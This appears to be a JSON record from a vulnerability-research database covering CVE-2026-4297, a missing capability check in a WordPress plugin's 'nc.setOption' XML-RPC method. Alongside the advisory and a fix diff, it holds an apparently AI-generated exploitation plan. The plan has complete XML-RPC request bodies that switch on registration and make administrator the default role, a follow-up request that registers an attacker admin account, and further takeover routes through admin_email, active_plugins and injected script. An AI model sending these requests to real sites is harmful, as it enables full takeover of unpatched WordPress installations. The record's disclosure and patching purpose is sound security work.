[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f0GCGHf4wB01JH3xo23n_8ceZgC8Q_24fh-lZS8Oyquk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2026-4297","welcome-software-publishing-authenticated-subscriber-arbitrary-options-update-to-privilege-escalation-via-ncsetoption-xm","Welcome Software Publishing \u003C= 0.0.31 - Authenticated (Subscriber+) Arbitrary Options Update to Privilege Escalation via 'nc.setOption' XML-RPC Method","The Welcome Software Publishing plugin for WordPress is vulnerable to Arbitrary Options Update in all versions up to and including 0.0.31. This is due to a missing capability check in the nc_setOption() function, which is exposed via the nc.setOption XML-RPC method. The function authenticates the user via $wp_xmlrpc_server->login() (verifying credentials are valid) but does not perform any authorization check such as current_user_can('manage_options'). This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary WordPress options via XML-RPC requests. This can be leveraged to change the default_role option to 'administrator' and then register a new administrator account, achieving full privilege escalation and site takeover.","newscred-publishing",null,"\u003C=0.0.31","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-06-23 16:42:18","2026-06-24 05:33:24",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F47e53fd3-4e3f-433a-8e70-3a58c864184a?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing)\n\n## 1. Vulnerability Summary\nThe **Welcome Software Publishing** (slug: `newscred-publishing`) plugin (\u003C= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-RPC method `nc.setOption` which maps to the PHP function `nc_setOption()`. While this function authenticates the provided credentials using the core WordPress XML-RPC server's login method, it fails to verify if the authenticated user possesses the necessary capabilities (like `manage_options`) to modify site settings. Consequently, any authenticated user—including those with the lowest privileges (Subscriber)—can update arbitrary WordPress options, leading to full site takeover via privilege escalation.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `http:\u002F\u002F\u003Ctarget-site>\u002Fxmlrpc.php`\n*   **Method:** `nc.setOption` (XML-RPC)\n*   **Payload Format:** XML-RPC `methodCall` with 4 parameters: `username`, `password`, `option_name`, and `option_value`.\n*   **Authentication:** Authenticated (Subscriber+)\n*   **Preconditions:** \n    1.  The plugin must be active.\n    2.  XML-RPC must be enabled (enabled by default in WordPress).\n    3.  The attacker must have valid credentials for a Subscriber-level account.\n\n## 3. Code Flow\n1.  **Registration:** The plugin uses the `xmlrpc_methods` filter to register `nc.setOption`.\n    *   *Likely registration code (inferred):* `add_filter('xmlrpc_methods', function($methods) { $methods['nc.setOption'] = 'nc_setOption'; return $methods; });`\n2.  **Entry Point:** An XML-RPC request hits `xmlrpc.php` with `\u003CmethodName>nc.setOption\u003C\u002FmethodName>`.\n3.  **Authentication:** `nc_setOption($args)` is called. The first two elements of `$args` are typically used to call `$wp_xmlrpc_server->login($username, $password)`.\n4.  **Vulnerable Sink:** If `login()` returns a `WP_User` object, the function proceeds to call `update_option($args[2], $args[3])`.\n5.  **The Flaw:** There is no check like `if ( ! current_user_can( 'manage_options' ) ) return new IXR_Error( 403, '...' );` between the login and the option update.\n\n## 4. Nonce Acquisition Strategy\n**XML-RPC methods do not use WordPress nonces.** Authentication is handled per-request via the username and password parameters included in the XML body. No nonce extraction or browser session is required for this specific attack vector.\n\n## 5. Exploitation Strategy\nThe goal is to enable registration and ensure new users are created as Administrators.\n\n### Step 1: Enable User Registration\nChange the `users_can_register` option to `1`.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fxmlrpc.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: text\u002Fxml`\n*   **Body:**\n```xml\n\u003C?xml version=\"1.0\"?>\n\u003CmethodCall>\n  \u003CmethodName>nc.setOption\u003C\u002FmethodName>\n  \u003Cparams>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_user\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_pass\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>users_can_register\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>1\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n  \u003C\u002Fparams>\n\u003C\u002FmethodCall>\n```\n\n### Step 2: Set Default Role to Administrator\nChange the `default_role` option to `administrator`.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fxmlrpc.php`\n*   **Method:** POST\n*   **Headers:** `Content-Type: text\u002Fxml`\n*   **Body:**\n```xml\n\u003C?xml version=\"1.0\"?>\n\u003CmethodCall>\n  \u003CmethodName>nc.setOption\u003C\u002FmethodName>\n  \u003Cparams>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_user\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>subscriber_pass\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>default_role\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n    \u003Cparam>\u003Cvalue>\u003Cstring>administrator\u003C\u002Fstring>\u003C\u002Fvalue>\u003C\u002Fparam>\n  \u003C\u002Fparams>\n\u003C\u002FmethodCall>\n```\n\n### Step 3: Register a New User\nPerform an unauthenticated registration.\n\n**Request:**\n*   **URL:** `http:\u002F\u002F\u003Cwp-host>\u002Fwp-login.php?action=register`\n*   **Method:** POST\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:** `user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register`\n\n## 6. Test Data Setup\n1.  **Install\u002FActivate Plugin:** Ensure `newscred-publishing` (Welcome Software Publishing) \u003C= 0.0.31 is active.\n2.  **Create Subscriber:** \n    *   `wp user create subscriber_user subscriber@example.com --role=subscriber --user_pass=subscriber_pass`\n3.  **Ensure XML-RPC is open:** (Default state).\n\n## 7. Expected Results\n*   **Steps 1 & 2:** The XML-RPC server should return a success response (likely a boolean `true` or the updated value wrapped in `\u003Cvalue>\u003Cboolean>1\u003C\u002Fboolean>\u003C\u002Fvalue>`).\n*   **Step 3:** The registration should succeed, and the database should reflect a new user `attacker_admin` with the `administrator` role.\n\n## 8. Verification Steps\nAfter running the exploit, verify the site state using WP-CLI:\n\n1.  **Check Registration Status:**\n    `wp option get users_can_register` (Should return `1`)\n2.  **Check Default Role:**\n    `wp option get default_role` (Should return `administrator`)\n3.  **Confirm New Admin User:**\n    `wp user get attacker_admin --field=roles` (Should return `administrator`)\n\n## 9. Alternative Approaches\nIf the plugin validates the specific options allowed for update, or if direct user registration is blocked by a WAF, alternative options can be targeted:\n*   **RCE via `active_plugins`:** Update `active_plugins` to include a path to a previously uploaded malicious file (if any).\n*   **Persistent XSS:** Update `blogname` or `blogdescription` to include a script tag `\u003Cscript>alert(1)\u003C\u002Fscript>` to target an actual administrator visiting the dashboard.\n*   **Site Takeover via `admin_email`:** Update `admin_email` to the attacker's email, then trigger a password reset for the primary administrator account.","The Welcome Software Publishing plugin (\u003C= 0.0.31) exposes a custom XML-RPC method 'nc.setOption' that allows authenticated users to update arbitrary WordPress options without capability checks. A subscriber-level user can exploit this to enable public registration and set the default user role to administrator, leading to full site takeover.","--- a\u002Fnewscred-publishing.php\n+++ b\u002Fnewscred-publishing.php\n@@ -1,5 +1,9 @@\n function nc_setOption($args) {\n     global $wp_xmlrpc_server;\n     if (!$user = $wp_xmlrpc_server->login($args[0], $args[1])) {\n         return $wp_xmlrpc_server->error;\n     }\n+\n+    if (!current_user_can('manage_options')) {\n+        return new IXR_Error(403, 'Insufficient permissions to manage options.');\n+    }\n \n     update_option($args[2], $args[3]);\n     return true;\n }","The exploit targets the xmlrpc.php endpoint using the 'nc.setOption' method. An attacker provides Subscriber-level credentials to authenticate via the XML-RPC server's login mechanism. Once authenticated, the attacker sends two sequential requests: the first to set the 'users_can_register' option to '1', and the second to set the 'default_role' option to 'administrator'. Following these changes, the attacker registers a new account via the standard WordPress registration page, which results in the creation of a new administrator-level user.","gemini-3-flash-preview","2026-06-25 19:10:32","2026-06-25 19:11:02",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnewscred-publishing\u002Ftags"]